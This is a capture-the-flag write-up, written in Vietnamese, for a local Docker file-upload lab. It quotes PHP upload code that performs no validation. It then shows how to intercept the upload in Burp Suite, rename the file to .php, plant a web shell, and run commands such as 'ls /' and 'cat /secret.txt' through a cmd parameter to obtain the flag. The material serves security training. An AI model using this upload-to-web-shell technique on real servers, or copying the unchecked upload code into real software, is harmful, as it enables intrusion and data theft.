```
ta sẽ cùng chú ý vào đoạn code :
```php
try {
$file = $dir . "/" . $_FILES["file"]["name"];
move_uploaded_file($_FILES["file"]["tmp_name"], $file);
```
hmmm , có vẻ trang web nầy ko hề có 1 cái j dùng để ngăn cản việc đăng tải untrusted data lên , ta có thể upload trực tiếp cái cái shellcode lên trang web thông qua tính năng upload file
## EXPLOIT
đầu tiên chúng ta sẽ khởi động burpsuite và docker lên để khởi chạy lại trang web
```docker
services:
upload-file-level-1:
build: ./level1
restart: unless-stopped
ports:
- "12001:80" #http://localhost:12001
volumes:
- ./level1/src:/var/www/html
- /var/www/html/upload
```
```
ports:
- "12001:80" : chuyển từ cổng 80 sang cổng 12001
```
```
vậy nên ta sẽ truy cập vào trang web khởi tạo lại bởi docker bằng đường link :
http://localhost:12001
```
giao diện của trang web :
1 lưu ý là thường burpsuite sẽ mặc định là không nhận REQUEST khi upload dạng images , nên chúng ta sẽ truy cập vào setting của Proxy để chỉnh lại
ta sẽ thử upload 1 file bất kì , t sẽ upload 1 file có tên là au.png
ta sẽ gửi `REQUEST` này tới `REAPEATER`
bước tiếp theo , ta sẽ sửa lại đuôi `filename` thành `.php` để hỗ trợ việc upload shellcode lên sever để có thể leo thang đặc quyền .
chúng ta sẽ sửa lại nội dung chứa trong file thành 1 shellcode đơn giản :
```php
```
kế đến ta sẽ gửi yêu cầu này , kế đến sẽ truy cập vào đường dẫn như bên dưới để thực thi việc yêu cầu sever liệt kê ra toàn bộ cá file có trên server
```url
http://localhost:12001/upload/7303d6e615544971d68ce8b0fd0cba4a/au.php?cmd=ls /
```
ta có xác định được file chứa flag chính là : `secret.txt`
```
http://localhost:12001/upload/7303d6e615544971d68ce8b0fd0cba4a/au.php?cmd=cat /secret.txt
```
ta sẽ dùng lệnh `cat /secret.txt` để có thể thực thi việc đọc nội dung trong file :
**FLAG**
```
CBJS{why-php-run-what?}
```
